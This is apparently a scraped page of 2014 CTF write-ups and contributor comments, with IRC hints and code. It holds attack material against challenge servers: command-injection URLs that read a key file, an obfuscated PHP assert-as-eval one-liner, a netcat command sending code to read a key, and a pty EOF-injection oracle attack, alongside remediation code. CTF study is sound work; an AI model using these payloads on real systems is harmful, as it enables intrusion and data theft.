ctfs / write-ups-2014
Wiki-like CTF write-ups repository, maintained by the community. 2014
curl 'http://phpcrypto.2014.ghostintheshellcode.com/crypto.php' --data 'function=dump' > source.html
20:04:11 <phiber_> godmode_, use function dump to get the source, then set debug arg and inject php code in plaintext var
Forked the solution of White Noise
11:06:59 <JohnDoe> you can find some write-ups there :
11:07:01 <JohnDoe> http://www.incertia.net/blog/
11:07:08 <JohnDoe> http://blogs.univ-poitiers.fr/e-laize/
11:07:13 <JohnDoe> http://tasteless.se/2014/05/
00:03:30 <steeve> for 300? authlog -> html5.js -> /analytics.js -> announcement.pdf -> announcement.pdf | pdfstreamdumper
Incomplete write-up: https://github.com/ctfs/write-ups/blob/master/csaw-ctf-2014/fluffy-no-more/README.md First steps to be added.
http://gynvael.vexillium.org/dump/xxxx.php.txt:
<?php $_=~¾¬¬º«; $_(~¯¶±«.'('.~ÎÌÌÈ.')'); ?>
The two barewords are Latin-1 byte strings chosen so that PHP's bitwise NOT (~) turns them back into ASCII: every byte is the complement of the intended character, so the function names never appear in the source in clear (PHP 5/7 treats an undefined bareword constant as the string of its own name, which is what makes the quoting unnecessary). One byte in each word is 0xAD, the complement of 'R'; Latin-1 renders it as an invisible soft hyphen and it was dropped when this page was captured, which is why the words above look like five and four characters. With it restored the script reads ASSERT('PRINT(1337)'), i.e. assert() used as eval().
The ami_id parameter is vulnerable to command injection. Either a semicolon or a URL-encoded newline (%0a) terminates the original shell command, so both of these list the script's directory:
http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=;ls;
http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=%0als%0a
ec2-api-tools-1.6.12.0
ec2.php
index.html
index_files
key.php
Reading key.php the same way:
http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=;cat%20key.php;
<?php
/* flag{0aea26e968895efa40b563e3e8fe8f19} */
echo('There\'s a key here.');
?>
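The newline variant is the reason a filter that only strips semicolons does not fix this class of bug. The example below is added here and is not the challenge's code: it assumes ec2.php did the equivalent of interpolating ami_id into a shell command line (the real script is not on this page), uses echo as a stand-in for the ec2-describe-images tool so it runs offline, and shows the two fixes a practitioner would reach for, an allow-list on the one value the endpoint legitimately takes and never letting a shell parse the argument at all.

```python
import re
import shlex
import subprocess

# Allow-list for the only value this endpoint should accept: "ami-" followed
# by 8 (older) or 17 (newer) lowercase hex digits.
AMI_ID = re.compile(r"ami-(?:[0-9a-f]{8}|[0-9a-f]{17})")


def is_valid_ami_id(ami_id: str) -> bool:
    return AMI_ID.fullmatch(ami_id) is not None


def run_unsafe(ami_id: str) -> str:
    """Assumed shape of the vulnerable code: the parameter is pasted into a
    command string that /bin/sh then parses. `echo` stands in for the real
    ec2-describe-images binary."""
    cmd = "echo describe-images " + ami_id
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_quoted(ami_id: str) -> str:
    """Partial fix: shell-quote the value (PHP's escapeshellarg equivalent).
    The shell still runs, but the parameter is a single literal word."""
    cmd = "echo describe-images " + shlex.quote(ami_id)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe(ami_id: str) -> str:
    """Full fix: validate against the allow-list, then pass argv directly so
    no shell ever sees the value. Anything that is not an AMI id is rejected."""
    if not is_valid_ami_id(ami_id):
        raise ValueError("not an AMI id: %r" % ami_id)
    argv = ["echo", "describe-images", ami_id]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for payload in (";echo injected;", "\necho injected\n"):
        print("unsafe :", repr(run_unsafe(payload)))
        print("quoted :", repr(run_quoted(payload)))
    print("safe   :", repr(run_safe("ami-0123abcd")))
```

Quoting alone is enough to stop the injection, but the allow-list is what prevents the next surprise (option injection such as a leading dash, or a value the downstream tool interprets as a path), so the two belong together.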
Hey guys,
Here's a write-up on the binary 100 challenge from the HITB CTF in Amsterdam by team hDs.
http://cedricvb.be/post/reverse-engineering-the-hitb-binary-100-ctf-challenge/
Cheers /c
BBGP: https://privatepaste.com/6afd54f16c
BYHD: http://zepvn.com/blog/defcon-ctf-quals-2014-byhd.php
dosfun4u: https://github.com/nopple/ctf/tree/master/dosfun4u
heap: http://pastebin.com/iM6wCRqa
polyglot link is broken: http://sigint.ru/writeups/2014/05/18/defcon-2014-quals--polyglot/
also, another polyglot: https://gist.github.com/IdolfHatler/d952bf797a4d71cddbba
http://cseweb.ucsd.edu/~hovav/papers/hs09.html
paper: http://cseweb.ucsd.edu/~hovav/dist/reconstruction.pdf
source: http://cseweb.ucsd.edu/~hovav/dist/rsabits-1.0.tar.gz
Note that it's not a drop in solution, but it's supposedly pretty close.
This is live as of now: http://backdoor.cognizance.org.in
$ base64 <<< "self.request.send(open('key').read())"
c2VsZi5yZXF1ZXN0LnNlbmQob3Blbigna2V5JykucmVhZCgpKQo=
$ echo ':c2VsZi5yZXF1ZXN0LnNlbmQob3Blbigna2V5JykucmVhZCgpKQo=' | nc -v radioactive.2014.ghostintheshellcode.com 4324
found 0 associations
found 1 connections:
1: flags=82<CONNECTED,PREFERRED>
outif en0
src 192.168.107.131 port 59275
dst 107.20.236.180 port 4324
rank info not available
TCP aux info available
Connection to radioactive.2014.ghostintheshellcode.com port 4324 [tcp/*] succeeded!
Waiting for command:
Welcom3ToTheNewAgeItsARevolutionISuppose
My solution to pwn200. Slightly different approach (overwrite saved EIP instead of GOT): https://gist.github.com/Bartol0/283564a864e270b554ef
Revenge of Imgception consists of 8 stages. Each stage involves extracting one type of image from another.
Prior to the game, a large number of images will be pre-generated to save processing power and reduce the infrastructure requirements of the challenge. Players will be presented with a randomly chosen image from this set. The idea is to cause confusion among the players, as two players working the challenge together are unlikely to receive the same image, though the challenge proceeds identically for all images. This behavior continues for the duration of the challenge, as the images for each stage are randomly selected when the challenge is generated.
1-1: The file is a JPEG. The next stage is hidden in COM segments (marker \xFF\xFE). The number of comment segments varies because each segment's 16-bit length field caps it at 65535 bytes, so a larger payload is split across several of them.
2-1: The file is an animated GIF. The next stage is hidden in a set of comment extensions as binary data. The number of comment extensions is variable depending on the size of the next stage.
3-1: The file is a zip full of PNG files. The next stage is spread among them. Each PNG has a custom chunk marked with a "icTf" header. Each chunk begins with 3 bytes of the order string ("ThankYouMarioButOurPrincessIsInAnotherCastle" * 20) followed by a null byte, followed by binary data. The binary data chunks from each file must be concatenated together in the order given by the order string. The entirety of the order string may not be used, as the zip contains a variable number of files.
4-1: The file is a floppy disk image containing the next stage. Nothing special about this one. The previous stage is complex enough to warrant a freebie.
5-1: The file is a Super Mario Brothers ROM image for the Nintendo Entertainment System. It is playable in the fceux emulator, and the hope is that players will attempt to play through the game to continue to the next stage. However, the next stage has actually been concatenated to the end of the ROM, and is marked with "GITS" * 512.
6-1: The file is an ISO image with a hidden directory. When mounted with the default Linux options, which prefer the Joliet directory tree when one is present, the only apparent file is a JPEG image. When the Joliet extension is disabled (mount -o nojoliet on Linux), the plain ISO 9660 tree exposes the next stage.
7-1: The file is a multi-page TIFF image with broken file magic. The file magic is \x49\x4d\x2a\x2a. The TIFF file header indicates whether the image is little or big endian by the first two bytes being either \x49\x49 (little) or \x4d\x4d (big). The next two bytes are similarly arranged, either \x2a\x00 (little) or \x00\x2a (big). The correct file header for this image is \x49\x49\x2a\x00. Once the header is fixed, the image contains three images - one world 7-1 image and two apparently identical world 8-1 images that constitute the next stage.
8-1: The files are two apparently identical greyscale BMP images. The images are not, however, identical. The final image is steganographically hidden in the delta between color byte values. By subtracting the byte values in one file from the corresponding byte in the other, some bytes will result in a value between -8 and +7. Each value represents a single nibble of the final image.
The final image contains a congratulatory message and the key: K00pas@llth3w@yd0wn
Use exiftool to extract the comments from the images.
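Stage 3-1 is the one that needs real code: walk the PNG chunk list of every file, pick out the icTf chunks, and sequence their payloads by the order string. The example below is added here and is not the challenge's generator or anyone's write-up. It builds a constructed zip of minimal PNGs (valid chunk framing and CRCs, no image data) so it runs offline, then reassembles the hidden stage from it. One assumption, because the description leaves it open: piece k carries the 3-byte tag ORDER[3k:3k+3]; the order string has period 44, so tags repeat after 44 pieces and the greedy replay below is only unambiguous for fewer files than that.

```python
import io
import random
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ORDER = "ThankYouMarioButOurPrincessIsInAnotherCastle" * 20


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Walk a PNG chunk by chunk, yielding (type, body, crc_ok); stops at IEND."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        if pos + 12 + length > len(png):
            raise ValueError("truncated chunk %r" % ctype)
        body = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        yield ctype, body, crc == (zlib.crc32(ctype + body) & 0xFFFFFFFF)
        pos += 12 + length
        if ctype == b"IEND":
            break


def make_png_with_piece(tag: bytes, piece: bytes) -> bytes:
    """Constructed minimal PNG: 1x1 greyscale IHDR, the custom icTf chunk, IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"icTf", tag + b"\x00" + piece)
            + png_chunk(b"IEND", b""))


def build_stage_zip(next_stage: bytes, piece_len: int = 7) -> bytes:
    """Constructed stand-in for the challenge zip: split the payload, tag piece k
    with ORDER[3k:3k+3] (assumption), and shuffle file names so they carry no order."""
    pieces = [next_stage[i:i + piece_len] for i in range(0, len(next_stage), piece_len)]
    order = list(range(len(pieces)))
    random.Random(2014).shuffle(order)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name_idx, k in enumerate(order):
            tag = ORDER[3 * k:3 * k + 3].encode()
            zf.writestr("img%03d.png" % name_idx, make_png_with_piece(tag, pieces[k]))
    return buf.getvalue()


def reassemble(zip_bytes: bytes) -> bytes:
    """Collect every icTf payload keyed by its tag, then replay the order string."""
    by_tag = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in sorted(zf.namelist()):
            for ctype, body, crc_ok in iter_chunks(zf.read(name)):
                if ctype != b"icTf":
                    continue
                if not crc_ok or body[3:4] != b"\x00":
                    raise ValueError("malformed icTf chunk in " + name)
                by_tag.setdefault(body[:3], []).append(body[4:])
    out = bytearray()
    k = 0
    while True:
        tag = ORDER[3 * k:3 * k + 3].encode()
        if len(tag) < 3 or not by_tag.get(tag):
            break  # order string exhausted, or fewer files than tags
        out += by_tag[tag].pop(0)
        k += 1
    return bytes(out)


if __name__ == "__main__":
    secret = b"constructed stage-4 floppy image bytes, split across PNG files"
    print(reassemble(build_stage_zip(secret)) == secret)
```

The CRC check matters more than it looks: a chunk that fails it is either corrupted or not a chunk at all, and silently accepting it is how a reassembled stage ends up one byte off with no hint where.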
Not a write-up. The aim of this repo is to make it easy for anyone to simply clone and play against the benchmark: https://github.com/janosgyerik/stripe-ctf3
It's not done yet. I already added most of the test data to eliminate dependence on Stripe's AWS instances. I'm still working on precise instructions, especially with trickier build steps, for example Scala. I will clone on a virgin Ubuntu and see what works out of the box and what doesn't, and add the precise setup steps, probably mostly apt-get install name1 name2 ... commands.
See you tomorrow in London!
Source (released after the CTF):
<html>
<head>
<title>Emdee</title>
<style type='text/css'>
body { font-family: Verdana, sans-serif; font-size: 15px; }
em { font-family: monospace; font-style: normal; font-weight: bold; padding: 4px 10px; background: #eee; border: 1px solid #aaa; }
strong { color: #800000; }
</style>
</head>
<body><center>
<h2>Welcome to Emdee</h2>
Welcome to the Emdee service. We use the famous <a href='http://www.ietf.org/rfc/rfc1321.txt'>MD5</a> algorithm to help keep your data secret.<p/>
MD5 is a one-way function, but it has a flaw: one can precompute a ton of MD5 hashes and make a rainbow table.<p/>
To mitigate this, we compute <em>MD5( SALT + your_secret )</em> (patent pending).<br/><br/>
<h3>See for yourself</h3>
We took a short dictionary word, fed it into our <b>genuine patent-pending algorithm</b> and got:<p/>
<em>40288d60073775070a7edcdcd1df9c56 -</em>.<p/>
Can you restore our secret word? We don't think so!<br/><br/>
<h3>Try for yourself</h3>
<strong>As for our FREE service, current timestamp will be added to your_secret</strong><br/>
Purchase the paid package to get rid of timestamp and to use our <b>genuine patent-pending algorithm</b>.<p/>
<big><form method='POST'>Secret: <input type='password' name='secret' /> <input type='submit' value='»' /></form></big>
<?php
$salt = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
if (isset($_POST['secret']) && $_POST['secret'] != "") {
echo "Result: ";
$timestamp = microtime(true);
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$proc = proc_open('socat - exec:md5sum,pty,ctty,echo=0', $descriptorspec, $pipes);
if (!$proc) {
echo "<strong>Error occured</strong>";
} else {
$data = "$salt" . $_POST['secret'] . $timestamp . "\x04\x04";
if (fwrite($pipes[0], $data) != strlen($data)) {
echo "<strong>Error occured</strong>";
}
$res = "";
while (!feof($pipes[1])) {
$res .= fgetc($pipes[1]);
}
echo "MD5( SALT + your_secret + $timestamp ) = <em>" . htmlspecialchars(trim($res)) . "</em>";
}
}
?>
</center></body>
</html>
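The detail worth noticing in the released source is how the input reaches md5sum: socat's pty,ctty,echo=0 puts a pseudo-terminal between the PHP script and md5sum, so every byte of SALT + secret + timestamp passes through the terminal line discipline in canonical mode before md5sum reads it. The example below is added here and is not the challenge's code or a published solution; it reproduces that path in Python with os.openpty() and shows that two ^D (0x04) bytes placed inside the secret end md5sum's input before the timestamp is ever reached, which turns the free service into an MD5(SALT + word) oracle against the dictionary hash. SALT, the timestamp and the word list are constructed stand-ins, and it needs a POSIX pty (Linux or macOS).

```python
import hashlib
import os
import termios

SALT = "x" * 40      # stand-in; the real salt is redacted in the released source
EOF_CHAR = "\x04"    # ^D, the terminal's VEOF; the script appends two itself


def read_through_pty(raw: bytes) -> bytes:
    """Feed raw bytes through a pty in canonical mode with echo off, as
    `socat - exec:md5sum,pty,ctty,echo=0` does, and return what a reader on
    the terminal side collects up to its first zero-length read (EOF)."""
    master, slave = os.openpty()
    try:
        attrs = termios.tcgetattr(slave)
        attrs[3] &= ~termios.ECHO            # echo=0; ICANON stays on
        termios.tcsetattr(slave, termios.TCSANOW, attrs)
        os.write(master, raw)                # small input, fits the pty buffer
        seen = b""
        while True:
            chunk = os.read(slave, 4096)     # canonical mode: one line per read
            if not chunk:                    # ^D on an empty line -> read() == 0
                return seen
            seen += chunk
    finally:
        os.close(slave)
        os.close(master)


def emdee_hash(secret: str, timestamp: str) -> str:
    """What the free service computes: MD5 over whatever md5sum actually received."""
    raw = (SALT + secret + timestamp + EOF_CHAR * 2).encode("latin-1")
    return hashlib.md5(read_through_pty(raw)).hexdigest()


def paid_hash(word: str) -> str:
    """MD5(SALT + word), the 'genuine patent-pending algorithm'."""
    return hashlib.md5((SALT + word).encode("latin-1")).hexdigest()


def oracle_for(word: str, timestamp: str) -> str:
    """Two ^D inside the secret: the first flushes SALT+word as a line, the
    second arrives on an empty line and reads as EOF, so the timestamp that
    the script writes afterwards is never part of the digest."""
    return emdee_hash(word + EOF_CHAR * 2, timestamp)


def crack(target_hash: str, wordlist, timestamp: str):
    """Dictionary attack on the paid-service hash using only the free service."""
    for word in wordlist:
        if oracle_for(word, timestamp) == target_hash:
            return word
    return None


if __name__ == "__main__":
    ts = "1400000000.1234"                   # constructed timestamp
    target = paid_hash("castle")             # constructed target in place of 40288d60...
    print(crack(target, ["apple", "mario", "castle"], ts))
```

Two other line-discipline behaviours bite the same design: the canonical input line is limited to 4095 bytes on Linux, with the excess silently discarded, and the erase and kill characters (0x7f, ^U, ^W) edit the pending line, so what md5sum hashes can differ from what the script wrote in several ways. A service that must hash untrusted bytes should hand them over a plain pipe, not a terminal.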
Here's a writeup I wrote, with exploit: http://thejh.net/written-stuff/defcon-quals-2014-sftp-writeup
notes.txt
amirite: http://www.cravetocode.com/2014/03/defkthon-ctf-misc-200-writeup.html
Would be happy if you link it.
Unbearable:
To solve this one you needed to edit the local player's "use accessory" attribute. The only accessory to edit is the wine. Adjust the random range numbers to be 100 and the wine will give you invincibility and let you bypass the bears.
Moon Boots:
Similar to Unbearable, you needed to change the player's initial jump velocity to something above 25. Then when you jump you wind up in space. Moon Boots!
Cave of Nope:
Again with the jump edited you can jump over the wall in the spider's cave. Kill the big spider and you get the flag.
Boaring Quest:
http://tasteless.se/2014/01/gits-2014-a-boaring-quest-pwn-adventure-150/
Hi, I've posted a writeup at my blog
http://blog.ztrix.me/blog/2014/05/10/asis-quals-2014-serial-number-writeup/
Could you include the link?
Thanks.
Recently a couple developers created Gitbook, an easy application which converts GitHub repositories into modern html websites. I recently set it up for the WIP CTF Resources, and I think it provides another way to read and make use of these great write ups.
@mathiasbynens has expressed that he likes the structure of the repository as folders, as it represents the culture of CTFs and is very intuitive and simple. The best part of creating a Gitbook for the repository is that the regular master branch would remain the same and function as it does now.
Since this repository is very large and will only continue to grow, I think it would be best to only have the most recent 3 or 4 CTFs presented in the book. That way the most visited write-ups can be found in an eye-pleasing layout, while if someone wants to see old write-ups they can look in the repository itself as they do now.
The only issue I see as of now is the build process for updating the book. So far I have had to rebuild the whole book and import the SUMMARY.md every time there is a change. This is a very tedious process, but once an easier method is found it would be a very simple process to have the book updated from changes in the master branch repository.
Hi, here's my writeup on Reversing 300 task from Defkthon CTF.
http://rce4fun.blogspot.com/2014/03/defkthon-ctf-2014-reversing-300-writeup.html
Thanks.
Some write-ups are listed here, let's add them here as well!
Hi, recently I've been searching for some of the solutions for hitcon-ctf 2014 and this is the solution for G8LA. I would like to add this solution here; this is a great initiative in CTF write-ups.
Solution.
http://lockboxx.blogspot.com.es/2014/08/hitcon-2014-ctf-writeup-g8la-forensics.html
PS: I don't know how you manage the additions, so I'm reporting this as an issue.
Best Regards.
09:52:13 <j0f> mathiasbynens, easy way would be using remote img upload and pointing to a netcat listen port
Anyone want to explain this in a bit more detail and add this alternate, easier solution to the write-up?
I've added tasks from GPN CTF 2014. Some tasks, descriptions and additional files are missing but since nobody was adding those I though I would check in what I have.